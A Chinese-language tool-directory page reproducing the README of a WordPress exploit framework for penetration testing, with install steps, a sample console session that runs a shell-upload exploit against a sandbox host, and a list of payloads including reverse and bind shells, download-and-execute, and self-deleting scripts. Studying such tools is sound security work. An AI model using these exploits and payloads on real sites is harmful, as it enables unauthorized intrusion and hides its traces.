Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
工具/GitHubGitHub/rastating/wordpress-exploit-framework
漏洞利用框架漏洞分析ShellcodeWeb应用程序漏洞利用渗透测试Payload 开发Archived
GitHubrastating/wordpress-exploit-framework

wordpress-exploit-framework

一个旨在辅助渗透测试WordPress系统的Ruby框架。

查看仓库网站
1.0k26186年前Kitploit 审核通过

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

WordPress 漏洞利用框架

构建状态 可维护性 覆盖率状态 Gem 版本

一个旨在协助对 WordPress 系统进行渗透测试的 Ruby 框架。


安装

要安装最新的稳定版本,请运行 gem install wpxf。

安装后,您可以通过运行 wpxf 启动 WordPress 漏洞利用框架控制台。

运行需要什么?

运行 WordPress 漏洞利用框架需要 Ruby >= 2.4.4。

安装故障排除

Debian 系统

如果在安装 WPXF 依赖项(特别是 Nokogiri)时遇到问题,请首先确保已安装编译 C 扩展所需的所有工具:

root@kitploit:~
sudo apt-get install build-essential patch

您的系统可能没有安装重要的开发头文件。如果遇到这种情况,建议您执行以下操作:

root@kitploit:~
sudo apt-get install ruby-dev zlib1g-dev liblzma-dev libsqlite3-dev

Windows 系统

如果遇到指示 libcurl.dll 无法加载的错误,则需要确保最新的 libcurl 二进制文件已包含在您的 Ruby bin 文件夹中,或包含在环境变量 PATH 中的任何其他文件夹里。

最新版本可以从 http://curl.haxx.se/download.html 下载。截至 2016 年 5 月 16 日,最新版本标记为 Win32 2000/XP zip 7.40.0 libcurl SSL。下载压缩包后,将 bin 目录中的内容解压到您的 Ruby bin 目录(如果提示,请不要覆盖任何现有的 DLL)。

如何使用它?

通过运行 wpxf 启动 WordPress 漏洞利用框架控制台。

加载完成后,您将看到 wpxf 提示符,在此可以使用 search 命令搜索模块,或使用 use 命令加载模块。

将模块加载到环境中后,可以使用 set 命令设置选项,并使用 info 查看关于模块的信息。

以下是一个示例,展示如何加载 symposium_shell_upload 漏洞利用模块,设置模块和 payload 选项,并对目标运行漏洞利用。

root@kitploit:~
wpxf > use exploit/shell/symposium_shell_upload

[+] Loaded module: #<Wpxf::Exploit::SymposiumShellUpload:0x3916f20>

wpxf [exploit/shell/symposium_shell_upload] > set host wp-sandbox

[+] Set host => wp-sandbox

wpxf [exploit/shell/symposium_shell_upload] > set target_uri /wordpress/

[+] Set target_uri => /wordpress/

wpxf [exploit/shell/symposium_shell_upload] > set payload exec

[+] Loaded payload: #<Wpxf::Payloads::Exec:0x434d078>

wpxf [exploit/shell/symposium_shell_upload] > set cmd echo "Hello, world!"

[+] Set cmd => echo "Hello, world!"

wpxf [exploit/shell/symposium_shell_upload] > run

[-] Preparing payload...
[-] Uploading the payload...
[-] Executing the payload...
[+] Result: Hello, world!
[+] Execution finished successfully

有关所有支持的命令的完整列表,请查看 此 Wiki 页面。

auxiliary 模块和 exploit 模块之间有什么区别?

Auxiliary 模块不允许您在目标机器上运行 payload,但允许您从目标提取信息、提升权限或提供拒绝服务功能。

Exploit 模块要求您指定一个 payload,该 payload 随后在目标机器上执行,允许您在 Web 服务器的上下文中运行任意代码以提取信息、建立远程 shell 或执行其他任何操作。

有哪些可用的 payload?

  • bind_php: 上传一个脚本,该脚本会绑定到特定端口,允许 WPXF 建立远程 shell。
  • custom: 上传并执行自定义 PHP 脚本。
  • download_exec: 下载并运行远程可执行文件。
  • meterpreter_bind_tcp: 使用 msfvenom 生成的 Meterpreter 绑定 TCP payload。
  • meterpreter_reverse_tcp: 使用 msfvenom 生成的 Meterpreter 反向 TCP payload。
  • exec: 在远程服务器上运行 shell 命令,并将输出返回给 WPXF 会话。
  • reverse_tcp: 上传一个脚本,该脚本会建立反向 TCP shell。

除 custom 和 Meterpreter payload 外,所有这些 payload 在执行后都会自删除,以避免在目标机器上留下痕迹,或者在使用它们建立 shell 失败时也是如此。

如何编写自己的模块和 payload?

关于编写模块和 payload 的指南可以在 Wiki 上找到,API 的完整文档可以在 https://rastating.github.io/wordpress-exploit-framework 找到。

许可证

版权所有 (C) 2015-2018 rastating

在未经事先相互同意的情况下对网站使用 WordPress 漏洞利用框架可能在您所在国家是非法的。作者及其参与开发的人员不承担任何责任,并且对 WordPress 漏洞利用框架造成的任何误用或损害不负责。

本程序为自由软件:您可以根据自由软件基金会发布的 GNU 通用公共许可证(许可证第 3 版,或(由您选择)任何更高版本)的条款重新分发和/或修改它。

分发本程序的目的是希望它有用,但没有任何担保;甚至没有默示的适销性或特定用途的适用性担保。有关详细信息,请参阅 GNU 通用公共许可证。

您应该已随本程序收到一份 GNU 通用公共许可证副本。如果没有,请参阅 http://www.gnu.org/licenses/。

下载工具